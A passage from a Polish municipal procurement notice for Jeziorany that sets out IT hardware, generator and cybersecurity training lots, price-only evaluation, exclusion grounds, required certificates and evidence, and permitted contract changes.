szt.) dla Miejskiego Ośrodka Pomocy Społecznej w Jezioranach;<br/>11)	dostawa serwera (1 szt.) dla Centrum Usług Wspólnych w Jezioranach;<br/>12)	dostawa urządzenia UTM (1 szt.) dla Centrum Usług Wspólnych w Jezioranach;<br/>13)	dostawa serwera NAS (1 szt.) dla Centrum Usług Wspólnych w Jezioranach;<br/>14)	przeprowadzenie specjalistycznego szkolenia dla personelu IT w zakresie zarządzania i zabezpieczania sieci z wykorzystaniem urządzeń UTM (4 szt.).<br/>15)	przeprowadzenie szkolenia specjalistycznego z zakresu etycznego testowania zabezpieczeń informatycznych – rozwój kompetencji personelu IT w dziedzinie ochrony sieci komputerowych (2 szt.).<br/>16)	przeprowadzenie szkolenia specjalistycznego dotyczące zabezpieczania i administrowania środowiskiem Active Directory ( 2 szt.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">32422000-7 - Elementy składowe sieci</p> <p class="mb-0">35100000-5 - Urządzenia awaryjne i zabezpieczające</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <p class="mb-0">80532000-2 - Usługi szkolenia w dziedzinie zarządzania</p> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>100 % cena<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/>2.	Punkty za kryterium Cena (C) zostaną obliczone według wzoru:<br/>C = (Cn / Cb) x 100<br/>gdzie:<br/>C - ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>W kryterium Cena (C), oferta z najniższą ceną otrzyma 100 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>3.	Jako najkorzystniejszą ofertę w danej części zamówienia Zamawiający wybierze ofertę, spośród ofert niepodlegających odrzuceniu, która uzyska największą liczbę punktów (P), obliczoną wg następującego wzoru: P = C <br/>gdzie:<br/>P - ocena końcowa ocenionej (badanej) oferty,<br/>C - ilość punktów uzyskanych przez ocenianą ofertę w kryterium Cena (C).<br/>4.	Zamawiający informuje, że Wykonawcy zostaną niezwłocznie poinformowani o wyborze najkorzystniejszej oferty dla danych Części postępowania, po uprzedniej weryfikacji złożonych ofert. <br/>5.	Zamawiający, zgodnie z art. 253 ust. 1 ustawy Pzp, niezwłocznie po wyborze najkorzystniejszej oferty informuje wszystkich Wykonawców o wyniku postępowania, w tym o wybranej ofercie, przyznanych punktach oraz o odrzuconych ofertach wraz z uzasadnieniem.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> dostawa agregatu prądotwórczego dla Urzędu Miejskiego w Jezioranach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>100 % cena<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/>2.	Punkty za kryterium Cena (C) zostaną obliczone według wzoru:<br/>C = (Cn / Cb) x 100<br/>gdzie:<br/>C - ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>W kryterium Cena (C), oferta z najniższą ceną otrzyma 100 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>3.	Jako najkorzystniejszą ofertę w danej części zamówienia Zamawiający wybierze ofertę, spośród ofert niepodlegających odrzuceniu, która uzyska największą liczbę punktów (P), obliczoną wg następującego wzoru: P = C <br/>gdzie:<br/>P - ocena końcowa ocenionej (badanej) oferty,<br/>C - ilość punktów uzyskanych przez ocenianą ofertę w kryterium Cena (C).<br/>4.	Zamawiający informuje, że Wykonawcy zostaną niezwłocznie poinformowani o wyborze najkorzystniejszej oferty dla danych Części postępowania, po uprzedniej weryfikacji złożonych ofert. <br/>5.	Zamawiający, zgodnie z art. 253 ust. 1 ustawy Pzp, niezwłocznie po wyborze najkorzystniejszej oferty informuje wszystkich Wykonawców o wyniku postępowania, w tym o wybranej ofercie, przyznanych punktach oraz o odrzuconych ofertach wraz z uzasadnieniem.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia, niezależnie od Części postępowania, mogą się ubiegać Wykonawcy, którzy:<br/>	nie podlegają wykluczeniu;<br/>	spełniają warunki udziału w postępowaniu, określone przez Zamawiającego w ogłoszeniu o zamówieniu oraz w ust. 3 rozdziału SWZ.<br/>2.	Zamawiający określa następujące podstawy wykluczenia z postępowania:<br/>2.1	Zamawiający wykluczy z postępowania Wykonawcę w przypadkach określonych w art. 108 ust. 1 pkt 1–6 ustawy Pzp (obligatoryjne przesłanki wykluczenia), a także w przypadku popełnienia innego czynu zabronionego, określonego w przepisach prawa obcego, w szczególności:<br/>2.1.1	będącego osobą fizyczną, prawomocnie skazaną za przestępstwo:<br/>a)	udziału w zorganizowanej grupie przestępczej albo związku mającym na celu popełnienie przestępstwa lub przestępstwa skarbowego, o którym mowa w art. 258 Kodeksu karnego;<br/>b)	handlu ludźmi, o którym mowa w art. 189a Kodeksu karnego;<br/>c)	określone w art. 228–230a, art. 250a Kodeksu karnego, art. 46–48 ustawy z dnia 25 czerwca 2010 r. o sporcie lub art. 54 ust. 1–4 ustawy z dnia 12 maja 2011 r. o refundacji leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych;<br/>d)	finansowania przestępstwa o charakterze terrorystycznym, o którym mowa w art. 165a Kodeksu karnego, lub przestępstwa udaremniania albo utrudniania stwierdzenia przestępnego pochodzenia pieniędzy lub ukrywania ich pochodzenia, o którym mowa w art. 299 Kodeksu karnego;<br/>e)	o charakterze terrorystycznym, o którym mowa w art. 115 § 20 Kodeksu karnego, lub popełnionego w celu jego dokonania;<br/>f)	powierzenia wykonywania pracy małoletniemu cudzoziemcowi, o którym mowa w art. 9 ust. 2 ustawy z dnia 15 czerwca 2012 r. o skutkach powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej (Dz.U. poz. 769);<br/>g)	przeciwko obrotowi gospodarczemu, o których mowa w art. 296–307 Kodeksu karnego, przestępstwa oszustwa, o którym mowa w art. 286 Kodeksu karnego, przestępstwa przeciwko wiarygodności dokumentów, o których mowa w art. 270–277d Kodeksu karnego, lub przestępstwa skarbowego;<br/>h)	o którym mowa w art. 9 ust. 1 i 3 oraz art. 10 ustawy z dnia 15 czerwca 2012 r. o skutkach powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej.<br/>2.1.2	jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w spółce jawnej lub partnerskiej albo komplementariusza w spółce komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie skazano za przestępstwo, o którym mowa w pkt 1;<br/>2.1.3	wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, chyba że wykonawca odpowiednio przed upływem terminu do składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert dokonał płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności;<br/>2.1.4	wobec którego prawomocnie orzeczono zakaz ubiegania się o zamówienia publiczne;<br/>2.1.5	jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że wykonawca zawarł z innymi wykonawcami porozumienie mające na celu zakłócenie konkurencji, w szczególności, jeżeli należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne oferty, oferty częściowe lub wnioski o dopuszczenie do udziału w postępowaniu, chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie;<br/>2.1.6	jeżeli, w przypadkach, o których mowa w Art. 85 Ust. 1, doszło do zakłócenia konkurencji wynikającego z wcześniejszego zaangażowania tego wykonawcy lub podmiotu, który należy z wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie konkurencji może być wyeliminowane w inny sposób niż przez wykluczenie wykonawcy z udziału w postępowaniu o udzielenie zamówienia;<br/>2.2	Zamawiający wykluczy z postępowania Wykonawcę w przypadkach, o których mowa w Art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (obligatoryjne podstawy wykluczenia), tj.:<br/>2.2.1	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w Rozporządzeniu 765/2006 i Rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w Art. 1 pkt 3 w/w ustawy;<br/>2.2.2	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu Ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w Rozporządzeniu 765/2006 i Rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w Art. 1 pkt 3;<br/>2.2.3	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu Art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości jest podmiot wymieniony w wykazach określonych w Rozporządzeniu 765/2006 i Rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej zastosowaniu środka, o którym mowa w Art. 1 pkt 3 w/w ustawy.<br/>2.3	Zamawiający przewiduje także dodatkowe/fakultatywne podstawy (przesłanki) wykluczenia zawarte w art. 109 ust. 1 pkt 8 i 10 ustawy i wykluczy z postępowania Wykonawcę <br/>w następujących przypadkach:<br/>2.3.1	który w wyniku zamierzonego działania lub rażącego niedbalstwa wprowadził zamawiającego w błąd przy przedstawianiu informacji, że nie podlega wykluczeniu, spełnia warunki udziału w postępowaniu lub kryteria selekcji, co mogło mieć istotny wpływ na decyzje podejmowane przez zamawiającego w postępowaniu o udzielenie zamówienia lub który zataił te informacje lub nie jest w stanie przedstawić wymaganych podmiotowych środków dowodowych;<br/>2.3.2	który w wyniku lekkomyślności lub niedbalstwa przedstawił informacje wprowadzające <br/>w błąd, co mogło mieć istotny wpływ na decyzje podejmowane przez zamawiającego <br/>w postępowaniu o udzielenie zamówienia.<br/>3.	Zamawiający określa warunki udziału w postępowaniu i informuje, że o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: <br/>3.1	Spełniają warunki dla danej Części postępowania, które to zostały szczegółowo ujęte w Rozdziale XII pkt. 3 i 4 SWZ oraz w Załączniku nr 1 do SWZ – Opis przedmiotu zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Załącznik nr 6 - oświadczenia o braku przynależności kapitałowej (wymagane oświadczenie również od podmiotów, które udostępniają zasoby Wykonawcy) - dla części 1,2,3,4.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dla części 1 : dokument potwierdzający minimum dwuletnie doświadczenie Wykonawcy w zakresie przeprowadzania audytów Systemu Zarządzania Bezpieczeństwem Informacji, opracowania dokumentacji SZBI oraz przeprowadzenia szkolenia z zakresu SZBI (minimum 1 rekomendacja z każdego obszaru).<br/>Dla części 2 : dokument potwierdzający doświadczenie Wykonawcy w zakresie prowadzenia szkoleń z obszaru cyberbezpieczeństwa (minimum 1 rekomendacja). <br/>Dla części 3 :polisy ubezpieczeniowej w zakresie ubezpieczenia OC na kwotę nie niższą niż 400 000,00 (słownie: czterysta tysięcy złotych brutto).<br/>Dla części 4 : polisy ubezpieczeniowej w zakresie ubezpieczenia OC na kwotę nie niższą niż 200 000,00 (słownie: dwieście tysięcy złotych brutto).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Część 1:1)	dok.potw. posiadanie zesp.audytorskiego,tj.min.2audytorów, z których każdy powinien pos.jeden z certyfikatów, o których mowa w Rozporz. Ministra Cyfryzacji z 12października2018r. w spr.wykazu certyfikatów uprawniających do przeprowadz. audytu;2)dok.potw.posiad. co najm.1 pentestera, tj. aktualny certyfikat (np. OSCP, CEH, GPEN, OSCE, LPT, CREST, CPT, Pentest+, CSXP) lub równoważne;<br/>Część 2: dok. potw. kwalifikacje Wykonawcy, tj.dyplom szkoleniowca w zakr. ukończ.studiów z zakr.informatyki lub cyberbezpieczeństwa (skan dok.);<br/>Część 3:1)TYP 1:- karta produktowa oferow.serwera umożliw.weryfik.jego parametrów;oświadcz.producenta serwera:-że serwer jest wyprod.zg.z normą ISO-9001:2015, ISO50001 oraz ISO-14001;-w zakr.deklaracji CE dla serwera; -że serwis urządzenia będzie realizow.bezpośr.przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta; -że sprzęt poch. z oficjaln.kanału dystrybucyjnego producenta;oświad. producenta serwera lub podmiotu realizującego serwis, że w przyp. awarii dysku twardego w urządzeniu objętym aktywnym wsparciem technicznym, uszkodzony dysk twardy pozost.u Zamawiającego;dok.potw., że:- firma serwisująca pos. ISO 9001:2015 oraz ISO-27001 na świadcz.usług serwis. oraz posiada autoryzację producenta urządzenia;-że sprzęt spełn.normy co najmn. Epeat Silver wg normy z 2019 r.;-że oferow.serwer znajd.się na liście Windows Server Catalog i pos.status„Certified for Windows” dla syst. Microsoft Windows Server 2022, Microsoft Windows Server 2025;oświadcz. producenta,że oferow.serwer jest wyposaż. w rozwiąz.zapewn. ochronę oprogramowania układowego przed manipulacją złośliwego oprogr.Ochrona taka musi być zgodna z zalec. NIST SP 800-147B i NIST SP 800-155 i pos. zaimplementowane sprzętowo mechanizmy kryptograficzne poświadcz. integralność oprogramowania BIOS (Root of Trust).TYP 2: - karta produktowa oferow. serwera umożliw. weryfik. jego parametrów;oświadcz. producenta serwera: -że serwer jest wyprod. zg. z normą ISO-9001:2015, ISO 50001 oraz ISO-14001; -że serwis urządzenia będzie realizow.bezpośr. przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta;- że sprzęt poch. z oficjalnego kanału dystrybucyjnego producenta;oświad. producenta w zakresie deklaracji CE dla serwera;oświad. producenta serwera lub podmiotu realizującego serwis, że w przyp. awarii dysku twardego w urządzeniu objętym aktywnym wsparciem technicznym, uszkodzony dysk twardy pozostaje u Zam.;dok.potw.: -że firma serwisująca pos. ISO 9001:2015 oraz ISO-27001 na świadcz.usług serwisowych oraz posiada autoryz. producenta urządzenia;-że sprzęt speł.normy co najmn.Epeat Silver wg normy z 2019 r.;-że oferow.serwer znajd.się na liście Windows Server Catalog i pos.status„Certified for Windows” dla syst. Microsoft Windows Server 2022, Microsoft Windows Server 2025;oświadcz.producenta, że oferow.serwer jest wyposaż. w rozwiąz.zapewn.ochronę oprogramowania układowego przed manipulacjązłośliwego oprogramowania. Ochronatakamusibyćzgodna z zalec. NIST SP 800-147B i NIST SP 800-155 i pos.zaimplementowane sprzętowo mechanizmy kryptograficzne poświadcz. integr.oprogramowania BIOS (Root of Trust).1)- karta produktowa obu oferow. urządzeń umożliw. weryf. ich parametrów; oświadcz. producenta:- w zakr.serwisu lub autoryzacji serwisowej,-o posiad. licencji oraz pełnych praw do oprogramowania do monitorow.pracy UPS,-o możliw.pobierania i dokonyw.aktualizacji oprogramowania do monitorow.pracy urządzeń UPS bez dod. kosztów.3), 4), 5,)7),10),13) -karta produktowa oferow. urządzeń umożliw. weryfi. parametrów; 6) -karta produktowa obu oferow. typów dysków umożliw. weryfik. parametrów; Z uwagi na ogr.ilość znaków cd. w rubr. Wykaz innych wymaganych oświadczeń lub dokumentów oraz w rubr. Pozostałe informacje. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> cd.przedmiotowych środków dowodowych Część 3:8)-karta produktowa oferow. serwera umożliw. weryfik. jego parametrów; oświad. producenta serwera, że serwer jest wyprod. zgodnie z normą ISO-9001:2015, ISO 50001 oraz ISO-14001;oświadcz. producenta:- w zakr. deklaracji CE dla serwera;- że oferow. serwer jest wyposaż. w rozwiąz. zapewn.ochronę oprogramowania układowego przed manipulacją złośliwego oprogramowania. Ochrona taka musi być zgodna z zalec. NIST SP 800-147B i NIST SP 800-155 i pos. zaimplementowane sprzętowo mechanizmy kryptograficzne poświadcz. integralność oprogramowania BIOS (Root of Trust);oświadcz. producenta serwera lub podmiotu realizującego serwis, że w przypad. awarii dysku twardego w urządzeniuobjętymaktywnymwsparciemtechnicznym, uszkodz. dysk twardy pozost.u Zamawiającego;oświadcz. producenta serwera, że serwis urządzenia będzierealizow.bezpośr.przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta;oświadcz. producenta serwera, że sprzęt poch. z oficjalnego kanału dystrybucyjnego producenta; dokum. potw.:- że firmaserwisującpos. ISO9001:2015 oraz ISO-27001 na świadcz. usług serwisowych oraz pos. autoryzację producenta urządzenia;-że sprzęt spełnia normy co najmn. Epeat Silver wg normy z 2019 r.;-że oferow. serwer znajd. się na liście Windows Server Catalog i pos.status „Certified for Windows” dla syst. Microsoft Windows Server 2022, Microsoft Windows Server 2025; <br/><br/>Wykonawca składa wraz z ofertą: <br/>Część 1: zał.nr 3,5A,przedmiotowe środki dowodowe dla części 1, zał.nr 7 (jeżeli dot.)<br/>Część 2: zał.nr 3,5B,przedm.śr.dowodowe dla części 2, zał.nr 7 (jeżeli dot.)<br/>Część 3: zał.nr 3,przedm.śr.dowodowe dla części 3, zał.nr 7 (jeżeli dot.)<br/>Część 4: zał.nr 3,przedmiotowe środki dowodowe dla części 4, zał.nr 7 (jeżeli dot.)<br/>oraz dla części 1,2,3,4 :pełnomocnictwo do reprezentowania Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego – w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku, gdy pełnomocnictwo zostało sporządzone w formie papierowej i opatrzone własnoręcznym podpisem, należy złożyć jego cyfrowe odwzorowanie (skan) opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym potwierdzającym zgodność odwzorowania z oryginałem. Poświadczenia zgodności cyfrowego odwzorowania pełnomocnictwa może dokonać mocodawca (osoba/osoby udzielające pełnomocnictwa) lub notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający informuje, że Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w ramach niniejszego postępowania, bez względu na wybraną część zamówienia.<br/>2.	Zamawiający wymaga, aby Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanowili pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu, a także do zawarcia umowy w sprawie zamówienia publicznego. <br/>3.	Punkt 2 niniejszego Rozdziału nie dotyczy spółki cywilnej, o ile upoważnienie bądź pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź sytuacji, kiedy wszyscy wspólnicy spółki cywilnej podpiszą ofertę. <br/>4.	Zamawiający wymaga, aby oferta Wykonawców, którzy ubiegają się wspólnie o udzielenie zamówienia, została podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących łącznie (tj. przez każdego z Wykonawców lub przez upoważnionego pełnomocnika). <br/>5.	W przypadku wspólnego ubiegania się o udzielenie zamówienia, każdy z Wykonawców wchodzących w skład konsorcjum zobowiązany jest do złożenia oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, zgodnie z treścią Załącznika nr 3 do SWZ. Oświadczenie to musi potwierdzać brak podstaw do wykluczenia, a także – w zakresie, w jakim dany Wykonawca wykazuje spełnienie danego warunku – spełnianie warunków udziału w postępowaniu. Dopuszcza się także złożenie oświadczenia w formie wspólnej, podpisanego przez wszystkich Wykonawców lub przez pełnomocnika działającego w ich imieniu.<br/>6.	Zamawiający informuje, że wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występujący w roli pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamaw.inform, że proj. postan.umowy w spr. zam.publiczn, które to postanow.zostaną wprowadz.do treści tej umowy, zawierazał.nr 4A,4B,4C,4D do SWZ – w zal.od Części postępow. 2.Zamaw.inform, żeprzysług.mu prawo do zm.postanowieńzawier.umowy, tj.w zakr.tzw. zmian kontraktowych w oparciu oArt.455Ust.1Ustawy Pzp,w odniesieniudo treścioferty, którą uznano zanajkorzystniejsząinapodstawiektórej dokonano wyboruWykon., zg z war.zawartymi w zał. nr 4doSWZ. tj.&#34;1.Stosow.do art. 455 ust. 1 pkt 1 Pzp, Zamaw.przewidujemożl.wprowadz.doumowyzm.opisanychw ust. poniz:1)wystąpiła uzasad.przyczyn.technicznymi konieczn.zm.spos.wykonaniaUmowy; 2)niezbędnajest zm.terminu realiz.umowy w przypad.zaistnienia okoliczn.lub zdarzeń uniemożliwiaj. realiz.umowy w wyznacz.terminie, na któreStrony niemiaływpływu; 3)powstała możl.zastosow.nowszych i korzystn.dla Zamaw.rozw. technolog. lub technicz., niż te istn.w chwilipodpisania Umowy, niepowoduj.zmiany przedm.umowy;4)w przyp.wydłuż.okresu gwarancyjn.lubrękojmi o dowolnyokres;5)wycof. z prod./sprzedaży jakiegokolw.model/typ urządzenia lub oprogramow.wskazan.wofercie Wykonawcy, Wykonaw.dostarczy obecnie produkowany /sprzedawany model/typ urządzenia lub oprogram. o parametrachniegorszychod wskazanych w ofercieWykon. w ramach wynagr.brutto, o którymmowa w § 3 ust. 1 umowy. W takim przyp. Wykonaw. zobow.jest do poinformow. Zamaw. oraz przedstaw.oświadcz.producenta/dystrybutora potw. fakt wycofania modelu/typu urządzenia lub oprogramow.wskaz.w ofercieWykon.wraz z konfiguracją urządzenia/oprogramow. obecnieprodukowanegocelem akceptacji przezZamaw.6)w przyp. wykrycia omyłek, rozbieżn.lub niejasności w niniejszej umowie, których nie można usunąć w inny sposób, a zmiana będzieumożl.ich usunięcie i doprecyz.Umowyzg.z jej celem lub w celu jednozn. interpretacji jej zapisów przez Wykon.iZamaw.7)w przyp. wprowadz.nowej wersji oprogramowania lub innychnowych elementów urządzeń lub oprogramow.przezproducenta, która towersjalubelem.niebyły dostępnenarynkuwchwili upł.term.skład.ofert, z zastrzeż.,żewskut.zmiany wsz.wymag.określ.w dokum.zamówienia orazwofercieWykon.zostaną zachow.a wynagrodz.Wykon.nie ulegnie podwyższ.8)w przyp.ogran.dostępn.poszczeg.element.urządzeń luboprogramow., oile elem.zastępczespeł.wszyst.wym. określ.w dok. zamówienia iofercieWykon. z zastrzeż, żeWykon.,pomimozachow.należ.staranności, niemógłtemu zapobiec;9)w przyp.ujawn.siępowszech.występ.wadoferow.element.urządzeń lub oprogramow.i zastąp. ichinnymrozwiąz.umożliw.należ.wykon.umowy, o ile nowe rozw. będzie spełniałowszyst.wymaganiaZamaw., a wynagrodz.Wykon.nieulegnie podwyż;10)w przyp.wydłuż.terminu realiz.przedm.umowy wskaz.w pkt 2, w okoliczn.niepowst.z winy Wykon.2.Zamaw. przewidujemożl.dokon.zm.podwykonaw/części wykonywan.przez niego zakresu, bądź wprowadz.nowego podwykon.3.Zamaw.na podst.art.455 ust, 1pkt1 ustawy PZP dopuści zmianę umowy wzakresiemodelu oferow.sprzętu w przyp, gdymodelzostałwycofanyzdystrybucji lubproducentsprzętu niemoże wyprod.tego modelu w term.określ.w nin.umowie z przycz.odniegoniezależn.i zostanie zastąp.innymoparametrach co 